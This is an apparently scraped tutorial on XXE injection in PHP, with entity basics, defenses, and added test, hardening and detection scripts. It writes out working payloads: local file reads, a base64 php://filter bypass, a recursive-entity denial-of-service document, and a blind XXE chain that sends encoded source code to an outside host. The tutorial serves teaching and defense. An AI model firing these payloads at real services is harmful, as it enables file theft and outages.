XXe Vulnerability Profile

Source: Internet
Author: User
Tags: base64, form, post
XXE: why the vulnerability cannot be reproduced

The main problem is the simplexml_load_file function. In old versions it parsed entities by default, but in newer versions it no longer does: you must pass LIBXML_NOENT as the third parameter of simplexml_load_file, otherwise the entities will not be parsed.


XXE entity injection in detail

0x00 Background

XXE injection is XML External Entity injection. The vulnerability arises when an XML processor handles untrusted external entity data. The XML 1.0 standard defines entities as part of the XML document structure. An entity works much like a "macro" in Word, or a template in Dreamweaver (DW): you define it once and can then reference it many times in one document, or reference the same entity from many documents. (XML defines two kinds of entity: the general entity discussed here, which is used within an XML document, and the parameter entity, which is used within the DTD.)

The definition syntax for an entity is:

<!DOCTYPE filename [
<!ENTITY entity-name "entity-content">
]>

The reference syntax for a defined entity in a document is:

&entity-name;

An entity can pull in external resources with the SYSTEM keyword, which supports a number of protocols, such as http and file. For example:

file:///path/to/file.ext
http://url/file.ext
php://filter/read=convert.base64-encode/resource=conf.php

0x01 Principle

If the XML parsed by a feature of the product is externally controllable, vulnerabilities such as file reads, DoS and CSRF can arise. Every language has components and functions that handle XML. In PHP, the functions that handle XML by default are xml_parse and the simplexml_load functions. xml_parse is implemented on the expat library, which does not resolve external entities by default, whereas the simplexml_load functions resolve external entities by default, creating a security risk. Write a script to test this yourself:

<?php
header("Content-Type: text/html; charset=utf-8");
$data = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NOENT); // $xml is externally supplied; LIBXML_NOENT is needed on newer PHP builds
echo $data;

Assuming that the variable $xml is externally controllable (for example, from form POST data), we write a malicious external entity as shown above, defining an xxe entity that reads /etc/passwd, pass the entity in through $xml, and finally let PHP's XML parsing function simplexml_load_string() parse it, which produces the XXE vulnerability.
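As an added self-test (not part of the original article), the following script checks whether the PHP build at hand resolves an external entity through simplexml_load_string(), first with default options and then with LIBXML_NOENT. It reads a temporary canary file that it creates itself instead of /etc/passwd, and assumes a Unix-like system so that the temp path works as a file:// URL.

```php
<?php
// Added self-test, not the article's code: does simplexml_load_string() on this
// PHP build resolve an external entity? Uses a canary file created here instead
// of /etc/passwd; assumes a Unix-like path (file:///tmp/...).
$marker = 'XXE-CANARY-' . bin2hex(random_bytes(4));
$tmp = tempnam(sys_get_temp_dir(), 'xxe');
file_put_contents($tmp, $marker);

// Same shape as the article's payload: a general entity with a SYSTEM identifier.
$xml = <<<XML
<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file://{$tmp}">
]>
<root>&xxe;</root>
XML;

/** Returns true when the parsed document contains the canary, i.e. the entity was resolved. */
function entity_resolved(string $xml, int $options, string $marker): bool
{
    $previous = libxml_use_internal_errors(true);   // keep parser warnings out of the output
    $doc = simplexml_load_string($xml, 'SimpleXMLElement', $options);
    libxml_clear_errors();
    libxml_use_internal_errors($previous);
    return $doc !== false && strpos((string) $doc, $marker) !== false;
}

foreach (['default options' => 0, 'LIBXML_NOENT' => LIBXML_NOENT] as $label => $options) {
    printf("%-16s: %s\n", $label,
        entity_resolved($xml, $options, $marker) ? 'entity RESOLVED (vulnerable)' : 'entity not resolved');
}
unlink($tmp);
```

Run it against each PHP/libxml combination you deploy; a "RESOLVED" line under default options means the parser configuration, not just the calling code, needs fixing.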


Besides the file-reading payload above, there are several other common payloads.

Reading site content

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xdsec [
<!ELEMENT methodname ANY>
<!ENTITY xxe SYSTEM "http://attacker.com/text.txt">
]>
<methodcall>
<methodname>&xxe;</methodname>
</methodcall>

If including a file fails, it may be because the file itself contains < characters, as happens when reading a PHP file. A base64-encoding bypass can then be used, such as:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xdsec [
<!ELEMENT methodname ANY>
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php">
]>
<methodcall>
<methodname>&xxe;</methodname>
</methodcall>

Denial-of-service attack script (recursive entity expansion)

<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "LOL">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>


0x02 Defense

1. Check the underlying XML parsing library in use and disable parsing of external entities by default.

2. When using third-party application code, apply upgrade patches promptly.

3. Strengthen monitoring of the system at the same time, so that the problem is noticed before others exploit it.

For PHP, because the XML parsing problem of the simplexml_load_string function lies in the libxml library, you can call the following function before loading the entities:

<?php
libxml_disable_entity_loader(true); // deprecated since PHP 8.0, where external entity loading is already disabled by default
?>

For protection when parsing in XMLReader or DOM mode, you can refer to the following code:

<?php
// With the XMLReader functionality:
$doc = XMLReader::xml($badXml, 'UTF-8', LIBXML_NONET);
// With the DOM functionality (only safe once the entity loader has been disabled as above; LIBXML_DTDLOAD would otherwise fetch the external DTD):
$dom = new DOMDocument();
$dom->loadXML($badXml, LIBXML_DTDLOAD | LIBXML_DTDATTR);
?>
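One way to put the defense points above into a single entry point, as an added example that is not code from the article: reject any DOCTYPE before parsing, parse with DOMDocument without LIBXML_NOENT or LIBXML_DTDLOAD and with network access disabled, then run two constructed inputs through it (a benign XML-RPC-style call and the article's file-reading payload).

```php
<?php
// Added example, not the article's code: one hardened entry point for untrusted XML.
final class UnsafeXmlException extends RuntimeException {}

function parse_untrusted_xml(string $xml): DOMDocument
{
    // 1. Refuse any DTD up front: external entities, parameter entities and the
    //    recursive "lolz" expansion all need a DOCTYPE, and API payloads do not.
    if (preg_match('/<!DOCTYPE/i', $xml)) {
        throw new UnsafeXmlException('DOCTYPE/DTD declarations are not accepted');
    }
    $previous = libxml_use_internal_errors(true);
    $dom = new DOMDocument();
    // 2. No LIBXML_NOENT, no LIBXML_DTDLOAD, and LIBXML_NONET: nothing is
    //    substituted or fetched even if a DTD slips past the pre-check.
    $ok = $dom->loadXML($xml, LIBXML_NONET);
    $errors = libxml_get_errors();
    libxml_clear_errors();
    libxml_use_internal_errors($previous);
    if (!$ok) {
        $first = $errors[0] ?? null;
        throw new UnsafeXmlException('malformed XML' . ($first ? ': ' . trim($first->message) : ''));
    }
    // 3. Defence in depth: a DOM that still carries a doctype node is rejected.
    if ($dom->doctype !== null) {
        throw new UnsafeXmlException('DTD present after parsing');
    }
    return $dom;
}

// Constructed inputs: a benign call, and the article's external-entity payload.
$samples = [
    'benign'  => '<methodcall><methodname>system.listMethods</methodname></methodcall>',
    'hostile' => '<?xml version="1.0"?><!DOCTYPE xdsec [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
               . '<methodcall><methodname>&xxe;</methodname></methodcall>',
];
foreach ($samples as $name => $doc) {
    try {
        $dom = parse_untrusted_xml($doc);
        printf("%-7s accepted, methodname = %s\n", $name,
            $dom->getElementsByTagName('methodname')->item(0)->textContent);
    } catch (UnsafeXmlException $e) {
        printf("%-7s rejected: %s\n", $name, $e->getMessage());
    }
}
```

The rejection message for the hostile sample should also be logged, since it is exactly the monitoring signal that defense point 3 asks for.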

Vulnerability cases on WooYun

http://www.wooyun.org/bugs/wooyun-2010-09351

http://www.wooyun.org/bugs/wooyun-2010-059911

http://www.wooyun.org/bugs/wooyun-2010-058381


Blind XXE injection

When the page returns no information, try blind XXE.

The core of purely blind XXE is the parameter entity, which has several characteristics:

A % reference can only be used inside a DTD, and it is expanded immediately, which allows entity definitions to be nested.

We use our own host to receive the server-side code; the payload inserted into the vulnerable page is as follows:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://ourserver_ip/evil.xml">
%remote;
%param1;
]>
<root>&external;</root>

The evil.xml on our host:

<!ENTITY % payload SYSTEM "php://filter/read=convert.base64-encode/resource=bb.php">
<!ENTITY % param1 "<!ENTITY external SYSTEM 'http://ourserver_ip/log.php?msg=%payload;'>">
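For the detection side of the blind variant, here is an added example (not from the original article) that scans raw request bodies for the indicators the two-stage payload above relies on: a DOCTYPE, SYSTEM entities (general or parameter), parameter-entity references and php://filter wrappers. The sample bodies are constructed here, and the hostname ourserver_ip is the article's placeholder.

```php
<?php
// Added detection example, not the article's code: flag XXE indicators in raw
// request bodies (e.g. from a WAF hook or an access-log replay).
function xxe_indicators(string $body): array
{
    $findings = [];
    if (preg_match('/<!DOCTYPE\b/i', $body)) {
        $findings[] = 'DOCTYPE declaration';
    }
    // <!ENTITY [%] name SYSTEM "uri"> : general (&name;) or parameter (%name;) external entity
    $re = '/<!ENTITY\s+(%\s*)?([A-Za-z_][\w.:-]*)\s+SYSTEM\s+(?:"([^"]*)"|\'([^\']*)\')/i';
    if (preg_match_all($re, $body, $m, PREG_SET_ORDER)) {
        foreach ($m as $e) {
            $uri  = $e[3] !== '' ? $e[3] : ($e[4] ?? '');
            $kind = $e[1] !== '' ? 'parameter' : 'general';
            $findings[] = sprintf('%s external entity "%s" -> %s', $kind, $e[2], $uri);
        }
    }
    if (preg_match('/%[A-Za-z_][\w.:-]*;/', $body)) {
        $findings[] = 'parameter-entity reference (blind/out-of-band stage)';
    }
    if (preg_match('#php://filter#i', $body)) {
        $findings[] = 'php://filter wrapper (file read / base64 bypass)';
    }
    return $findings;
}

// Constructed sample bodies: a benign call, the first stage from the page, and evil.xml.
$bodies = [
    'benign'   => '<?xml version="1.0"?><methodcall><methodname>ping</methodname></methodcall>',
    'stage1'   => '<?xml version="1.0"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://ourserver_ip/evil.xml">'
                . '%remote;%param1;]><root>&external;</root>',
    'evil.xml' => '<!ENTITY % payload SYSTEM "php://filter/read=convert.base64-encode/resource=bb.php">'
                . '<!ENTITY % param1 "<!ENTITY external SYSTEM \'http://ourserver_ip/log.php?msg=%payload;\'>">',
];
foreach ($bodies as $name => $body) {
    $hits = xxe_indicators($body);
    printf("%-8s %s\n", $name, $hits ? implode('; ', $hits) : 'no indicators');
}
```

Signature checks like these support the monitoring called for in the defense section; the parser configuration described there remains the actual control, since encoded or obfuscated bodies can evade a regex.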